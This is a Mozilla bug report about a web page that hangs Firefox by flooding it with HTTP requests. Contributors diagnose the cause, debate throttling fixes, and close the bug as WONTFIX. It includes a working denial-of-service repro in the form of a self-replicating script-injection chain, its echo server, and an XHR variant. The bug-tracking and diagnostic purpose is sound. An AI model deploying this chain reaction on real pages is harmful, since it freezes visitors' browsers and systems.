Closed Bug 1514413 Opened 6 years ago Closed 5 years ago

Opening http://datakitchen.tumblr.com completely hangs system, causes high disk I/O

Categories

(Core :: Networking, defect, P3)

64 Branch
defect

Tracking

()

RESOLVED WONTFIX
Performance Impact medium

People

(Reporter: 13hurdw, Assigned: mayhemer)

References

(Blocks 1 open bug, )

Details

(Keywords: csectype-dos, perf:resource-use, Whiteboard: [necko-triaged])

Attachments

(2 files, 1 obsolete file)

Attached image datakitchen.tumblr.com hanging Firefox (deleted) —
Firefox 64 on Ubuntu 18.04.1 LTS

To reproduce:

- http://datakitchen.tumblr.com/

Actual results:
Visiting the site causes Firefox to hang completely and the entire system to slow down, with heavy disk I/O for easily ~30 minutes. Eventually I was forced to REISUB to get back into my machine.
This site is essentially causing a denial-of-service condition.

Reproduced on two different Ubuntu machines and a clean profile.


Expected results:
The site opens like a normal website; I/O should be throttled.

I could reproduce this issue on:

User Agent 	Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Component: Untriaged → JavaScript Engine
Product: Firefox → Core

I just reproduced this on my machine as well. It basically DoSed the browser. Content is actually responsive here, but chrome is not: the close-window button, the back button, and chrome buttons on other windows no longer worked after this.

Seems like a serious issue.

Marking P1.

Priority: -- → P1

Nicolas, could you take a look at this?

Flags: needinfo?(nicolas.b.pierron)

Kannan, would it be possible to get a profile, even a perf profile if the Gecko profiler is not responding?
From the description of this bug I am not sure if this belongs to the JavaScript category.

Flags: needinfo?(nicolas.b.pierron) → needinfo?(kvijayan)
Keywords: hang
Whiteboard: [qf]
Whiteboard: [qf] → [qf:p1:pageload]
Whiteboard: [qf:p1:pageload] → [qf:p2:resource]

I don't think it's likely JS either. There's nothing specific in SpiderMonkey that would drive heavy disk I/O. If the site is heavily using local storage or some other filestore-touching API, then the throttling responsibility would fall to the subsystem involved.

If the browser is hanging, the Gecko Profiler will not be usable. This is probably better pursued with a system profiler on the binary to identify the subsystem.

That's still not ideal, since this appears to be an extreme system slowdown, but it has a better chance of working effectively than the Gecko Profiler route.

Flags: needinfo?(kvijayan)
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → General
Ever confirmed: true

Here is a profile I managed to grab from the Gecko Profiler before the browser became unresponsive: http://bit.ly/2XnigXd. This was with the latest Firefox Nightly on Win 10 x64.

Assignee: nobody → violet.bugreport
Component: General → Networking

I've found the problem.

A minimal example to reproduce the bug would be:

<head>
</head>
<body>
<script>
// Each appended <script> loads a response whose body is just "evil()",
// so every completed request fans out into five more requests.
let h = document.getElementsByTagName("head")[0];
let i = 0;

function evilimpl() {
  let s = document.createElement("script");
  s.type = "text/javascript";
  s.async = true;
  s.src = "http://127.0.0.1/echo_evil.js?" + i; // unique URL for every request
  i++;
  h.appendChild(s);
}

function evil() {
  for (let k = 0; k < 5; ++k) {
    evilimpl();
  }
}
evil();
</script>
</body>

Then use a server like nginx to serve echo_evil.js with the following content:

evil()
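For reference, here is a minimal stand-in for the nginx setup, assuming Node.js is available and the server is allowed to listen on 127.0.0.1:80 so the URL matches the repro (otherwise adjust the port in both places):

// Answers every request with the body "evil()", mimicking echo_evil.js.
const http = require("http");

http.createServer((req, res) => {
  res.writeHead(200, { "Content-Type": "text/javascript" });
  res.end("evil()");
}).listen(80, "127.0.0.1");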

Logging shows the content process is issuing far more HTTP requests than the parent can handle in this case. I may need some time to figure out what is going on here...

Blocks: eviltraps

If you need any help from the networking team, please let me know. Thanks.

Whiteboard: [qf:p2:resource] → [qf:p2:resource][necko-triaged]
Attachment #9051900 - Attachment is obsolete: true

The hang is caused by a flood of countless HttpChannelParent::DoAsyncOpen() calls that render the main-thread event loop of the parent process almost useless.

See my attached file. Actually, this can be reproduced by any JavaScript code that issues a network request, such as <script>, <img>, XMLHttpRequest, etc.
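As an illustration, a hypothetical XHR variant of the same chain reaction, assuming the page itself is served from the same 127.0.0.1 origin as echo_evil.js so the requests are same-origin:

// Every finished request fans out into five more, whether it succeeded or not.
let n = 0;
function evilXhr() {
  for (let k = 0; k < 5; ++k) {
    const xhr = new XMLHttpRequest();
    xhr.open("GET", "/echo_evil.js?" + n++);
    xhr.onloadend = evilXhr;
    xhr.send();
  }
}
evilXhr();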

I couldn't find any throttling in netwerk/protocol/http that restricts how many HTTP requests a child can send to the parent. So a possible solution is to add some throttling code to netwerk/protocol/http/HttpChannelChild.cpp, e.g. in HttpChannelChild::AsyncOpen(): if the content process is issuing too many HTTP requests in a short period, reject them, so that the parent process is protected from being flooded by those events.
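To sketch the idea only (this is not necko code; the window size and the limit are invented numbers), the check could look roughly like a sliding-window counter consulted at the start of each open:

// Illustrative sketch: reject an open when the child has already issued
// too many requests within the last second.
const WINDOW_MS = 1000;
const MAX_OPENS_PER_WINDOW = 500;
let recentOpens = [];

function shouldRejectOpen(now = Date.now()) {
  recentOpens = recentOpens.filter(t => now - t < WINDOW_MS);
  if (recentOpens.length >= MAX_OPENS_PER_WINDOW) {
    return true; // over the limit: reject this request
  }
  recentOpens.push(now);
  return false;
}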

What do you think about this? I'm not sure if it's the best solution since I'm unfamiliar with the networking codebase.

Flags: needinfo?(kershaw)

(In reply to violet.bugreport from comment #11)

> So a possible solution is to add some throttling code to
> netwerk/protocol/http/HttpChannelChild.cpp, e.g. in
> HttpChannelChild::AsyncOpen(): if the content process is issuing too many
> HTTP requests in a short period, reject them, so that the parent process
> is protected from being flooded by those events.

I think it would be risky to throttle the creation of HTTP requests, since this might break real web sites.

Dragana, I think we've encountered something like this before, but I can't find the bug number right now. Do we already have a conclusion on how to deal with this kind of problem?

Flags: needinfo?(kershaw) → needinfo?(dd.mozilla)

> I think it would be risky to throttle the creation of HTTP requests, since this might break real web sites.

That makes sense. However, we could still locally enqueue the requests when there are too many pending ones and send them to the parent later.
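To sketch what I mean (illustrative only; the names and the limit are invented, this is not the actual necko code):

// Cap the number of in-flight opens per content process and park the rest
// in a local queue that drains as earlier requests finish.
const MAX_IN_FLIGHT = 100;
const pendingOpens = [];
let inFlight = 0;

function openChannel(doAsyncOpen) { // doAsyncOpen: () => Promise
  if (inFlight >= MAX_IN_FLIGHT) {
    pendingOpens.push(doAsyncOpen); // defer instead of flooding the parent
    return;
  }
  inFlight++;
  doAsyncOpen().finally(() => {
    inFlight--;
    if (pendingOpens.length > 0) {
      openChannel(pendingOpens.shift()); // drain one queued open
    }
  });
}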

In a nutshell, there should be a mechanism that avoids flooding the parent; otherwise a bad website can use this to force a user to keep reading its page while the whole browser is unresponsive. Chrome doesn't have this problem.

(In reply to violet.bugreport from comment #13)

> Chrome doesn't have this problem.

When I just loaded the page in Chrome, it in fact caused quite some problems for Chrome as well. You can continue to scroll the page smoothly, and you can continue to use the menus and open new tabs, but I could not close the tab with the evil page in it any more. Closing Chrome makes the UI disappear, but the Chrome Helper process keeps running at 100% CPU until you kill it; only then is Chrome able to shut down.

(In reply to Nils Ohlmeier [:drno] from comment #14)

> When I just loaded the page in Chrome, it in fact caused quite some
> problems for Chrome as well.

Chromium has said they won't fix anything with this: https://bugs.chromium.org/p/chromium/issues/detail?id=915405#c2

Unassigned since it's likely a WONTFIX...

Assignee: violet.bugreport → nobody
Priority: P1 → P3

(In reply to violet.bugreport from comment #16)

> Unassigned since it's likely a WONTFIX...

This should still be a higher priority for FF. The effect is worse in FF (a total system DoS) than in Chrome.

Just because Chromium said they won't fix it does not mean Mozilla should.

> Just because Chromium said they won't fix it does not mean Mozilla should.

That is not my reason for saying it's probably a WONTFIX. Please read comment 12 from the networking team: the issue was already known, but there doesn't seem to be any fix for it. That's why marking this P1 doesn't make sense (P1 means it will be fixed in the current release cycle).

Assignee: nobody → honzab.moz

Still reproducible with that page. Each new script request is for a different URL. I/O comes from the cache as we use a separate file for each URL. Throttling of requests on the child process is not a proper fix. This is more a general scheduling issue, but not just that. If a user wants to close the offending tab, the whole chain of events coming from the interaction to close the tab should have a high enough priority to skip over the long tail of stuff pending in the main thread queue.

Tested with Release and Nightly (66, 68).

There are two things that concern me:

  • memory consumption of both the parent process and the content process grows, more or less exponentially
  • the I/O stays at roughly the same level the whole time

These two factors will make a system running on lower-end hardware swap and become unusable relatively quickly.

This particular attack (if the page really is trying to attack) follows a chain-reaction scheme. Detecting it and stepping in when it actually becomes evil may be quite tricky. Any heuristic we might invent for the chain reaction (preferably in the parent process rather than in the child process) will not apply to a single content-side loop quickly creating requests.

The only option seems to be a general (though quite high) limit on requests per unit of time: if a page goes over the threshold, we immediately start rejecting (canceling) its requests. That is always a very sensitive thing to do and may break actual sites, so I tend toward not implementing any such thing.

WONTFIXing, but I'll keep this in mind.

Status: NEW → RESOLVED
Closed: 5 years ago
Flags: needinfo?(dd.mozilla)
Keywords: hang → csectype-dos
Resolution: --- → WONTFIX
Performance Impact: --- → P2
Whiteboard: [qf:p2:resource][necko-triaged] → [necko-triaged]